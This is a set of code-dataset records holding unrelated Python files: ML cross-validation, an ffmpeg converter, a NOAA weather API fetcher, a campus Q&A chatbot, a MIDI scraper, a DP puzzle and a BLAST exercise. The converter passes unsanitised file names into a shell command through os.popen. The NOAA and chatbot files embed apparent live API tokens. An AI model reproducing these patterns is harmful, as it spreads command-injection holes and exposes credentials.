pd.DataFrame()\r\n\r\nfor name, model in models:\r\n    kcv = cross_val_score(model, X_train, y_train, cv = 10)\r\n    best_mean.append((name, kcv.mean()))\r\n    best_std.append((name, kcv.std()))\r\n    model_performance = 
model_performance.append([kcv])\r\n    names.append(name)\r\n    \r\n#Making predictions on Validation Set\r\npredictions = pd.DataFrame()\r\nfor name, model in models:\r\n    model.fit(X_train, y_train)\r\n    predictions = predictions.append([model.predict(X_test)])\r\n#transpose once, after the loop, so each classifier's predictions form one column\r\npredictions = predictions.T\r\npredictions.columns = [i for i in range(4)]\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Pet Adoption - HackerEarth/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262488890","text":"import os\n\ndef converter(filename, input_format, output_format, directory):\n\ttry:\n\t\tpath = ('{}/{}').format(directory, filename)\n\t\tinput_file = ('\\'{}.{}\\'').format(path, input_format)\n\t\toutput_file = ('\\'{}.{}\\'').format(path, output_format)\n\t\tcommand = (\"ffmpeg -loglevel panic -i {} {}\").format(input_file, output_file)\n\t\tos.popen(command)\n\t\tprint('The video was successfully converted to mp3. Exiting.')\n\t\treturn\n\texcept:\n\t\tprint('Something went wrong during the mp3 conversion. Run the program again.')\n\t\texit()\n\t\n\nif __name__ == \"__main__\":\n\tconverter('video', 'mp4', 'mp3', '.')  # example arguments (hypothetical)\n","sub_path":"modules/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556636441","text":"import requests\nimport json\n\nfile_counter = 0\noffset_counter = 1\n\nurl = ' https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&locationid=FIPS:' \\\n      '10003&startdate=2018-01-01&enddate=2018-01-31&limit=1000&offset=1001'\n\nr = requests.get(url, headers={\n    'token': 'kiMomNqDkIjROzHmmalPEEzfuKLCmEeI',\n    'Content-Type': 'application/json'\n})\njsonResult = r.json()\n\njsonR = jsonResult['results']\njsonPath = '/Users/amishra/DEV/DataEngineering.Labs.NOAADailySummaries/data/daily_summaries/'\nwith open('daily_summaries_FIPS10003_jan_2018_1' + '.json', \"w\") as outfile:\n    json.dump(jsonResult, outfile)\nfile_counter = file_counter + 1\noffset_counter = offset_counter + 1000\n","sub_path":"data/daily_summaries/make_requests.py","file_name":"make_requests.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381871215","text":"from .models import *\nimport re\nimport spacy\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\nfrom .helpfunctions import *\nimport json\nfrom .apiai_code import *\nfrom string import Template\nfrom .answernews import *\n\nimport apiai\n\n#types: Building, Employee, Class\n#answer type:\n# location (map)\n# person\n# class\n# message\n# google url\n\nnlp = spacy.load(\"./QA/data/FIT_model_b_c_e\")\n\nfit_ner = None\nwith open(\"./QA/data/FIT_dictionary.txt\", \"r\") as f:\n    lines = f.readlines()\n    words = set(lines)\n    fit_ner = [w.replace(\"\\n\",\"\") for w in words]\n\ndef translate(question_raw):\n    standard_pairs = Word_Standard.objects.all()\n\n    for s in standard_pairs:\n        if s.original_word.lower() in question_raw.lower() and s.standard_word.lower() not in question_raw.lower():\n            question_raw = question_raw.replace(s.original_word, s.standard_word)\n            question_raw = question_raw.replace(s.original_word.lower(), s.standard_word)\n            break\n\n    doc_raw = nlp(question_raw)\n    #case sensitive: capitalize every word\n    question_capitalized = question_raw.title()\n\n    doc_capitalized = 
nlp(question_capitalized)\n\n if doc_capitalized.ents == doc_raw.ents:\n return question_raw\n\n ents = doc_capitalized.ents\n\n question_translated = question_raw\n\n for ent in ents:\n if ent.text in fit_ner:\n raw_text = \"\".join([t.lower() for t in ent.text])\n question_translated = question_raw.replace(raw_text, ent.text)\n\n return question_translated\n\n\ndef answer_question(question):\n\n question = translate(question)\n doc = nlp(question)\n ents = doc.ents\n\n labels = [ent.label_ for ent in ents]\n\n print(ents)\n\n small_talk_result = small_talk(question)\n print(small_talk_result)\n if small_talk_result[\"answer_messages\"][0]:\n print(\"small talk\")\n answer = small_talk_result\n return answer\n else:\n answer_news_result = answernews(question)\n if answer_news_result != None:\n print(\"answer news\")\n answer = {\"answer_type\": \"string\", \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n answer[\"answer_messages\"].append(answer_news_result)\n elif \"FIT_BUILDING\" in labels or \"FIT_COURSE\" in labels or \"FIT_EMPLOYEE\" in labels:\n if \"FIT_BUILDING\" in labels:\n # asking about buildings\n print(\"building\")\n answer = answer_building(question, ents[0].text)\n elif \"FIT_COURSE\" in labels:\n # asking about course\n print(\"course\")\n answer = answer_course(question, ents[0].text)\n elif \"FIT_EMPLOYEE\" in labels:\n print(\"employee\")\n answer = answer_employee(question, ents[0].text)\n else:\n print(\"url\")\n answer = answer_url(question)\n\n return answer\n\n\ndef answer_building(question, keyword):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n building = Building.objects.filter(Q(building_code__iexact=keyword) | Q(building_name__iexact=keyword) | Q(building_abbr__iexact=keyword))\n if building:\n answer[\"answer_type\"] = \"string\"\n\n if \"name\" in question.lower():\n for b in building:\n answer[\"answer_messages\"].append(b.building_name)\n elif \"code\" in question.lower():\n for b in building:\n answer[\"answer_messages\"].append(b.building_code)\n elif \"address\" in question.lower() or \"location\" in question.lower() or \"where\" in question.lower():\n answer[\"answer_type\"] = \"location\"\n answer[\"length_range\"] = range(len(building))\n for b in building:\n answer[\"answer_messages\"].append((b.street+\"\\n\"+b.city+\", \"+b.state+\"\\n\"+b.zip+\"\\n\", b.street))\n else:\n answer[\"answer_type\"] = \"location\"\n building_template = Template(\"Name: $name\\n\"\n \"Code: $code\\n\"\n \"Address: $address\\n\")\n for b in building:\n building_str = building_template.substitute(name=b.building_name, code=b.building_code, address=b.street+\"\\n\"+b.city+\", \"+b.state+\"\\n\"+b.zip+\"\\n\")\n answer[\"answer_messages\"].append((building_str, b.street))\n\n\n else:\n answer[\"answer_type\"] = \"string\"\n answer[\"answer_messages\"].append(\"Sorry, it's not in our database. 
Please check your spelling.\")\n return answer\n\n\ndef answer_course(question, keyword):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n course = Course.objects.filter(Q(crn__iexact=keyword) | Q(title__iexact=keyword) | Q(subject__iexact=keyword[:3], course_number__iexact=keyword[-4:]) | Q(subject__iexact=keyword))\n\n if course:\n answer[\"answer_type\"] = \"string\"\n if \"instructor\" in question.lower() or \"teaches\" in question.lower() or \"teacher\" in question.lower() or \"who\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + c.instructor)\n elif \"location\" in question.lower() or \"classroom\" in question.lower() or \"class room\" in question.lower() or \"where\" in question.lower():\n answer[\"answer_type\"] = \"location\"\n answer[\"length_range\"] = range(len(course))\n for c in course:\n building = load_dirty_json(c.building)\n message = (\"section \" + c.section + \"\\n\" + building[\"name\"] + \" \" + c.room, building[\"street\"])\n answer[\"answer_messages\"].append(message)\n\n elif \"time\" in question.lower() or \"when\" in question.lower() or \"days\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + c.days + \" \" + c.begin_time + \"-\" + c.end_time)\n elif \"prerequisite\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + c.prerequisites)\n elif \"capacity\" in question.lower() or \"enroll\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + str(c.actual_enroll) + \"/\" + str(c.max_enroll))\n elif \"credit\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + str(c.credit_hours))\n else:\n answer[\"answer_type\"] = \"string\"\n course_template = Template(\"CRN: $crn \\nCode: $code \\nSection: $section \\n\"\n \"Title: $title \\n Description: $description \\n\"\n \"Instructor: $instructor \\n\"\n \"Credit Hour: $credit_hour\\n\"\n \"Location: $location\\n\"\n \"Time: $time\\n\"\n \"Actual Enrollment: $actual, Max Enrollment: $max\")\n for c in course:\n location_str = \"TBA\"\n if c.building != \"TBA\":\n building = load_dirty_json(c.building.replace(\"None\", \"'None'\"))\n location_str = building[\"name\"] + \" \" + c.room\n\n course_str = course_template.substitute(crn=c.crn, code=c.subject+c.course_number, section=c.section,\n title=c.title, description=c.description, instructor=c.instructor,\n credit_hour=str(c.credit_hours), location=location_str,\n time=c.days + \" \" + c.begin_time + \"-\" + c.end_time,\n actual=c.actual_enroll, max=c.max_enroll)\n answer[\"answer_messages\"].append(course_str)\n\n\n else:\n answer[\"answer_type\"] = \"string\"\n answer[\"answer_messages\"].append(\"Sorry, it's not in our database. 
Please check your spelling.\")\n\n    return answer\n\n\ndef answer_employee(question, keyword):\n    answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n\n    if \"professor\" in keyword.lower() or \"prof\" in keyword.lower() or \"dr\" in keyword.lower():\n        keyword_list = keyword.split(\" \")[1:]\n        # drop the title and join the remaining name parts back together\n        keyword = \" \".join(keyword_list)\n\n    if len(keyword.split(\" \")) == 2:\n        employee = Employee.objects.filter(Q(last_name__iexact=keyword) | Q(first_name__iexact=keyword) | Q(first_name__iexact=keyword.split(\" \")[0], last_name__iexact=keyword.split(\" \")[1]))\n    else:\n        employee = Employee.objects.filter(Q(last_name__iexact=keyword) | Q(first_name__iexact=keyword))\n\n    if employee:\n        answer[\"answer_type\"] = \"string\"\n        if \"contact\" in question.lower():\n            for e in employee:\n                answer[\"answer_messages\"].append(e.first_name + \" \" + e.last_name + \"\\n\" + 'email: ' + e.email + '\\n phone: +' + e.phone_international_code + ' (' + e.phone_area_code + ') ' + e.phone_number)\n        elif \"email\" in question.lower():\n            for e in employee:\n                answer[\"answer_messages\"].append(e.first_name + \" \" + e.last_name + \"\\n\" + e.email)\n        elif \"phone\" in question.lower() or \"number\" in question.lower():\n            for e in employee:\n                answer[\"answer_messages\"].append(e.first_name + \" \" + e.last_name + \"\\n\" + e.phone_international_code + ' (' + e.phone_area_code + ') ' + e.phone_number)\n        elif \"where\" in question.lower() or \"office\" in question.lower() or \"find\" in question.lower():\n            answer[\"answer_type\"] = \"location\"\n            answer[\"length_range\"] = range(len(employee))\n\n            for e in employee:\n                position = load_dirty_json(e.position.replace(\"None\", \"'None'\"))\n\n                primary = position[\"primary\"]\n                building = primary[\"building\"]\n                room = building[\"room\"]\n                message = (e.first_name + \" \" + e.last_name + \"\\n\" + building[\"name\"] + \" \" + room[\"number\"], building[\"street\"])\n                answer[\"answer_messages\"].append(message)\n\n\n        else:\n            answer[\"answer_type\"] = \"string\"\n            employee_template = Template(\"Name: $prefix $first_name $last_name \\n\"\n                                         \"Email: $email \\n\"\n                                         \"Phone: $phone \\n\"\n                                         \"Office: $office\")\n            for e in employee:\n                position = load_dirty_json(e.position.replace(\"None\", \"'None'\"))\n                primary = position[\"primary\"]\n                building = primary[\"building\"]\n                room = building[\"room\"]\n                employee_str = employee_template.substitute(prefix=e.prefix_name, first_name=e.first_name, last_name=e.last_name,\n                                                            email=e.email, phone=e.phone_international_code + ' (' + e.phone_area_code + ') ' + e.phone_number,\n                                                            office=building[\"name\"] + \" \" + room[\"number\"])\n                answer[\"answer_messages\"].append(employee_str)\n    else:\n        answer[\"answer_type\"] = \"string\"\n        answer[\"answer_messages\"].append(\"Sorry, it's not in our database. 
Please check your spelling.\")\n    return answer\n\n\ndef answer_frompassage(question):\n    answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n    from googleapiclient.discovery import build\n    service = build(\"customsearch\", 'v1',developerKey=\"AIzaSyDjsBfa0igZZQUL6gMdDKEMIGsX6j-2HVA\")\n    res = service.cse().list(q=question, cx=\"006188269277128775091:loi0aooxt4w\").execute()\n    answer[\"answer_type\"] = \"url\"\n    answer[\"answer_messages\"].append(res[\"items\"][0][\"link\"])  # link of the top search result\n    return answer\n\ndef answer_url(question):\n    answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n    urlsearch = \"https://www.google.com/search?q=site%3Afit.edu+\" + question.replace(\" \", \"+\").lower()\n    answer[\"answer_type\"] = \"url\"\n    answer[\"answer_messages\"].append(urlsearch)\n    return answer\n\n\ndef small_talk(question):\n    answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n    # Initialize API.AI client\n\n    client = apiai.ApiAI(APIAI_CLIENT_ACCESS_TOKEN)\n\n    # Create new request\n\n    request = client.text_request()\n    request.query = question\n\n    # Receive response and convert it to JSON\n\n    response = request.getresponse()\n\n\n    answer[\"answer_type\"] = \"string\"\n    answer[\"answer_messages\"].append(json.loads(response.read().decode())[\"result\"][\"fulfillment\"][\"speech\"])\n\n    return answer\n\n\n\n\n","sub_path":"website/FIT_QA_SYSTEM/QA/question_answering.py","file_name":"question_answering.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489249766","text":"import re\r\n\r\nimport requests\r\nfrom lxml import etree\r\n\r\nmapname = {}\r\nbasepath = r'C:\\Users\\v-jiaxwa\\Desktop\\4'\r\nr1 = requests.get('http://en.midimelody.ru/category/midi-melodies/')\r\nwhile 1:\r\n    html = r1.text\r\n    data = etree.HTML(html)\r\n    ls_downpage = data.xpath('//h3/a/@href')\r\n\r\n    for k in range(len(ls_downpage)):\r\n        r2 = requests.get(ls_downpage[k])\r\n        data2 = etree.HTML(r2.text)\r\n        templs = data2.xpath('//div[@class=\"div_tab_rows\"]/p/span/a')\r\n        str_name = ''\r\n        for i in range(len(templs)):\r\n            str_name = templs[i].text\r\n            str_name = re.sub(r\"[^A-Za-z0-9.\\-]\", '', str(str_name)).replace(\".mid\", '')\r\n            if str_name in mapname.keys():\r\n                # duplicate title: bump its counter and append it so file names stay unique\r\n                mapname[str_name] += 1\r\n                str_name = str_name + str(mapname[str_name])\r\n            else:\r\n                mapname[str_name] = 0\r\n            headers = {\r\n                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'}\r\n            headers.update({\"Referer\": ls_downpage[k]})\r\n            r = requests.get('http://en.midimelody.ru'+str(templs[i].xpath('@href')[0]),\r\n                             timeout=5,\r\n                             headers=headers)\r\n            with open(basepath + '\\\\' + str(str_name) + '.mid', 'wb') as f:\r\n                print(str(str_name))\r\n                f.write(r.content)\r\n    
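# (added, hedged note) with the duplicate-name fix above, a second track that cleans\r\n    # to e.g. \"Yesterday\" is saved as Yesterday1.mid instead of overwriting Yesterday.mid\r\n    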
try:\r\n        next_url = data.xpath('//*[@id=\"content\"]//div[@class=\"navigation\"]/a[@class=\"next page-numbers\"]/@href')[0]\r\n        r1 = requests.get(next_url)\r\n    except:\r\n        break\r\nprint(\"Done!\")\r\n","sub_path":"ceshixiazai.py","file_name":"ceshixiazai.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86884936","text":"\"\"\"\r\nhard 2021-12-.... interval DP (区间DP) (ByteDance)\r\nhttps://leetcode-cn.com/problems/minimum-cost-to-merge-stones/solution/yi-dong-you-yi-dao-nan-yi-bu-bu-shuo-ming-si-lu-he/\r\n-\r\n- prefix sums: the sum of nums[i...j] is sum[j] - sum[i-1]\r\n\r\n\"\"\"\r\n# dp[i,j] = the cheapest way to merge the interval [i,j].\r\n# State transition, in its most common form:\r\n# dp[i,j] = max/min{dp[i,j], dp[i,k] + dp[k+1,j] + cost}  ## i.e. whether or not to split at point k\r\n# Pick a split point k inside [i,j], solve [i,k] and [k+1,j] optimally, then combine them into the optimum for [i,j].\r\n\r\n# Enumerate i as the left boundary of the subinterval, j as the right boundary and k as the split point.\r\n# Because the answer is the dp value over the whole range, iterate intervals from short to long so every transition only uses already-solved dp states.\r\nclass Solution:\r\n    def mergeStones(self, stones, k):\r\n        n = len(stones)\r\n        # merging k piles into 1 removes k-1 piles each time,\r\n        # so n piles can only collapse to one pile if (n-1) % (k-1) == 0\r\n        if (n - 1) % (k - 1) != 0:\r\n            return -1\r\n        # compute prefix sums; sum(i, j) = preSum[j + 1] - preSum[i] gives a range sum quickly\r\n        preSum = [0 for _ in range(n + 1)]\r\n        for i in range(n):\r\n            preSum[i + 1] = preSum[i] + stones[i]\r\n        # print(preSum) # [0, 3, 8, 9, 11, 17]\r\n\r\n        # dp[i][j] = minimal cost to merge stones[i..j] as far as the rules allow\r\n        dp = [[0 for _ in range(n)] for _ in range(n)]\r\n        # an interval needs at least k piles before any merge is possible\r\n        for length in range(k, n + 1):\r\n            for i in range(n - length + 1):\r\n                j = i + length - 1\r\n                # step the split point by k-1 so the left part can always be reduced to one pile\r\n                dp[i][j] = min(dp[i][m] + dp[m + 1][j] for m in range(i, j, k - 1))\r\n                # when [i..j] itself can collapse to one pile, add the cost of that final merge\r\n                if (length - 1) % (k - 1) == 0:\r\n                    dp[i][j] += preSum[j + 1] - preSum[i]\r\n        return dp[0][n - 1]\r\n\r\nif __name__ == '__main__':\r\n    stones = [3,5,1,2,6]\r\n    K = 3\r\n    print(Solution().mergeStones(stones, K))\r\n","sub_path":"07_动态规划/区间DP/1000-合并石头的最低成本.py","file_name":"1000-合并石头的最低成本.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47580275","text":"import numpy as np\nimport sys\n\nfrom pathlib import Path\nfrom collections import defaultdict\n\nimport time\n\n\n\"\"\"\nATTENTION: Use the following dictionaries to get the correct index for each\n           amino acid when accessing any type of matrix (PSSM or substitution\n           matrix) parameters. Failure to do so will most likely result in not
Failure to do so will most likely result in not\n passing the tests.\n\"\"\"\nALPHABET = 'ACDEFGHIKLMNPQRSTVWY'\nAA_TO_INT = {aa: index for index, aa in enumerate(ALPHABET)}\nINT_TO_AA = {index: aa for index, aa in enumerate(ALPHABET)}\n\nclass DatabaseObj:\n\n def __init__(self, seq):\n if seq is not None:\n self.seq = seq\n else:\n self.seq = \"\"\n\n def contains(self, word):\n return word in self.seq\n\n def all_indices(self, sub, offset=0):\n list_index = []\n i = self.seq.find(sub, offset)\n while i >= 0:\n list_index.append(i)\n i = self.seq.find(sub, i + 1)\n return list_index\n\nclass Database:\n\n def __init__(self, word_size):\n # keep all state per instance; class-level mutable defaults would be\n # shared between every Database object\n self.word_size = word_size\n self.sequences = []\n self.seq_word_dict = defaultdict(lambda: defaultdict(list))\n\n def append(self, seq):\n self.sequences.append(DatabaseObj(seq))\n seq_index = len(self.sequences) - 1\n for i in range(len(seq) - (self.word_size - 1)):\n self.seq_word_dict[seq[i:i + self.word_size]][seq_index].append(i)\n\n def get_containing(self, word):\n seq_dict = self.seq_word_dict[word]\n\n result = []\n\n for x in seq_dict:\n result.append(self.sequences[x].seq)\n\n return result\n\n def count_distinct_words_in_seq(self):\n total = 0\n\n for single_dict in self.seq_word_dict.values():\n total += len(single_dict)\n\n return total\n\n def db_stats(self):\n distinct_count = self.count_distinct_words_in_seq()\n\n result = (len(self.sequences), len(self.seq_word_dict),\n int(round(distinct_count/len(self.sequences))),\n int(round(distinct_count/len(self.seq_word_dict))))\n\n return result\n\n def current_millis(self):\n # return the value itself rather than a lambda that would produce it\n return int(round(time.time() * 1000))\n\n\nclass BlastDb:\n\n def __init__(self):\n \"\"\"\n Initialize the BlastDb class.\n \"\"\"\n self.db = Database(3)\n\n def add_sequence(self, sequence):\n \"\"\"\n Add a sequence to the database.\n\n :param sequence: a protein sequence (string).\n \"\"\"\n\n self.db.append(sequence)\n\n def get_sequences(self, word):\n \"\"\"\n Return all sequences in the database containing a given word.\n\n :param word: a word (string).\n\n :return: List with sequences.\n \"\"\"\n\n return self.db.get_containing(word)\n\n def get_db_stats(self):\n \"\"\"\n Return some database statistics:\n - Number of sequences in database\n - Number of different words in database\n - Average number of words per sequence (rounded to nearest int)\n - Average number of sequences per word (rounded to nearest int)\n\n :return: Tuple with four integer numbers corresponding to the mentioned\n statistics (in order of listing above).\n \"\"\"\n return self.db.db_stats()\n\n\nclass Blast:\n\n def __init__(self, substitution_matrix):\n \"\"\"\n Initialize the Blast class with the given substitution_matrix.\n\n :param substitution_matrix: 20x20 amino acid substitution score matrix.\n \"\"\"\n\n self.sub_matrix = substitution_matrix\n self.word_size = 3\n\n def get_words(self, *, sequence=None, pssm=None, T=11):\n \"\"\"\n Return all words with score >= T for given protein sequence or PSSM.\n Only a sequence or PSSM will be provided, not both at the same time.\n A word may only appear once in the list.\n\n :param sequence: a protein sequence (string).\n :param pssm: a PSSM (Lx20 matrix, where L is length of sequence).\n :param T: score threshold T for the words.\n\n :return: List of unique words.\n \"\"\"\n\n result = {}\n\n if sequence is not None:\n unique_input_words = self.get_unique_words(sequence)\n\n for 
single_word in unique_input_words:\n subs = defaultdict(list)\n base_score = self.get_score_three_word(single_word, single_word)\n for i in range(len(single_word)):\n subs[i] = self.get_substitutes_for(single_word[i], base_score - T)\n\n found_sub_candidate = self.build_word_from_dict(subs)\n\n # check if new words all have high enough score\n for candidate in found_sub_candidate:\n if self.get_score_three_word(single_word, candidate) >= T:\n result[candidate] = 1\n elif pssm is not None:\n dict = {}\n for i in range(len(pssm)):\n dict[i] = self.get_worthy_char_from_row(pssm[i])\n\n found_sub_candidate = []\n for i in range(len(pssm) - (self.word_size - 1)):\n for possible_candidate in self.build_word_from_dict(dict, i):\n if self.get_pssm_score_for_word(pssm, i, possible_candidate) >= T:\n result[possible_candidate] = 1\n\n return result.keys()\n\n def get_unique_words(self, seq):\n dict = {}\n for i in range(len(seq) - (self.word_size - 1)):\n dict[seq[i:i + self.word_size]] = 1\n\n return dict.keys()\n\n def get_score_three_word(self, from_word, to_word):\n return self.sub_matrix[AA_TO_INT[from_word[0]]][AA_TO_INT[to_word[0]]] +\\\n self.sub_matrix[AA_TO_INT[from_word[1]]][AA_TO_INT[to_word[1]]] +\\\n self.sub_matrix[AA_TO_INT[from_word[2]]][AA_TO_INT[to_word[2]]]\n\n def get_substitutes_for(self, character, threshold):\n row = self.sub_matrix[AA_TO_INT[character]]\n own_sub = row[AA_TO_INT[character]]\n\n result = []\n\n for i in range(len(row)):\n if own_sub - row[i] <= threshold:\n result.append(INT_TO_AA[i])\n\n return result\n\n def build_word_from_dict(self, dict, start=0):\n result = [\"\"]\n\n #for i in range(len(dict)):\n for i in range(start, start + self.word_size):\n\n new_result = []\n for part in result:\n for new_char in dict[i]:\n new_result.append(part + new_char)\n\n result = new_result\n\n return result\n\n def get_worthy_word_from_pssm(self, pssm):\n pass\n\n def get_worthy_char_from_row(self, row):\n result = []\n min = - 5\n\n for i in range(len(row)):\n if row[i] >= min:\n result.append(INT_TO_AA[i])\n\n return result\n\n def get_pssm_score(self, pssm, i, char):\n return pssm[i][AA_TO_INT[char]]\n\n def get_pssm_score_for_word(self, pssm, start, str):\n counter = 0\n sum = 0\n\n for char in str:\n sum += self.get_pssm_score(pssm, start + counter, char)\n counter += 1\n\n return sum\n\n def search_one_hit(self, blast_db, *, query=None, pssm=None, T=13, X=5, S=30):\n \"\"\"\n Search a database for target sequences with a given query sequence or\n PSSM. Return a dictionary where the keys are the target sequences for\n which HSPs have been found and the corresponding values are lists of\n tuples. 
Each tuple is a HSP with the following elements (and order):\n - Start position of HSP in query sequence\n - Start position of HSP in target sequence\n - Length of the HSP\n - Total score of the HSP\n The same HSP may not appear twice in the list (remove duplicates).\n Only a sequence or PSSM will be provided, not both at the same time.\n\n :param blast_db: BlastDB class object with protein sequences.\n :param query: query protein sequence.\n :param pssm: query PSSM (Lx20 matrix, where L is length of sequence).\n :param T: score threshold T for the words.\n :param X: drop-off threshold X during extension.\n :param S: score threshold S for the HSP.\n\n :return: dictionary of target sequences and list of HSP tuples.\n \"\"\"\n d = dict()\n d['SEQWENCE'] = [(1, 2, 4, 13)]\n # stub: return the placeholder result promised by the docstring\n return d\n\n def search_two_hit(self, blast_db, *, query=None, pssm=None, T=11, X=5, S=30, A=40):\n \"\"\"\n Search a database for target sequences with a given query sequence or\n PSSM. Return a dictionary where the keys are the target sequences for\n which HSPs have been found and the corresponding values are lists of\n tuples. Each tuple is a HSP with the following elements (and order):\n - Start position of HSP in query sequence\n - Start position of HSP in target sequence\n - Length of the HSP\n - Total score of the HSP\n The same HSP may not appear twice in the list (remove duplicates).\n Only a sequence or PSSM will be provided, not both at the same time.\n\n :param blast_db: BlastDB class object with protein sequences.\n :param query: query protein sequence.\n :param pssm: query PSSM (Lx20 matrix, where L is length of sequence).\n :param T: score threshold T for the words.\n :param X: drop-off threshold X during extension.\n :param S: score threshold S for the HSP.\n :param A: max distance A between two hits for the two-hit method.\n\n :return: dictionary of target sequences and list of HSP tuples.\n \"\"\"\n d = dict()\n d['SEQWENCE'] = [(1, 2, 4, 13)]\n # stub: return the placeholder result promised by the docstring\n return d\n","sub_path":"codechecker/repos/5/collected_files/blast/ga63waz.py","file_name":"ga63waz.py","file_ext":"py","file_size_in_byte":9796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"569253995","text":"from src.binding_types import TypeInfo\nfrom src.type_parsing_regeces import TypeParsingRegeces\n\nvar_is_arr_regex = TypeParsingRegeces.IS_VARIABLE_AN_ARRAY_REGEX\nvar_ty_regex = TypeParsingRegeces.VARIABLE_TYPE_REGEX\n\n\ndef map_types_to_swift(fn_arg, ret_arr_len, java_c_types_none_allowed, tuple_types, unitary_enums, language_constants):\n\tunaltered_function_argument = fn_arg # if necessary\n\tfn_arg = fn_arg.strip()\n\tnon_nullable = False\n\tif fn_arg.startswith(\"MUST_USE_RES \"):\n\t\tfn_arg = fn_arg[13:]\n\tis_const = False\n\tif fn_arg.startswith(\"const \"):\n\t\tfn_arg = fn_arg[6:]\n\t\tis_const = True\n\tif fn_arg.startswith(\"struct \"):\n\t\tfn_arg = fn_arg[7:]\n\tif fn_arg.startswith(\"enum \"):\n\t\tfn_arg = fn_arg[5:]\n\tif 'NONNULL_PTR' in fn_arg:\n\t\tnon_nullable = True\n\tfn_arg = fn_arg.replace(\"NONNULL_PTR\", \"\")\n\n\tstripped_function_argument = fn_arg\n\n\tis_ptr = False\n\ttake_by_ptr = False\n\trust_obj = None\n\tarr_access = None\n\n\t# the way that a type is represented in Swift, typically for humans and machines\n\tswift_type = None\n\n\t# the way that Swift automatically maps C types when divergent from what people use, like const char * not being a String\n\tswift_raw_type = None\n\n\tif fn_arg.startswith(\"LDKThirtyTwoBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[18:] + 
\")[32]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKThirtyTwoBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKPublicKey\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[33]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKPublicKey\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"compressed_form\"\n\telif fn_arg.startswith(\"LDKSecretKey\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[32]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKSecretKey\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"bytes\"\n\telif fn_arg.startswith(\"LDKSignature\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[64]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKSignature\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"compact_form\"\n\telif fn_arg.startswith(\"LDKThreeBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[14:] + \")[3]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKThreeBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKFourBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[4]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKFourBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKTenBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[12:] + \")[10]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKTenBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKSixteenBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[16:] + \")[16]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKSixteenBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKTwentyBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[15:] + \")[20]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = 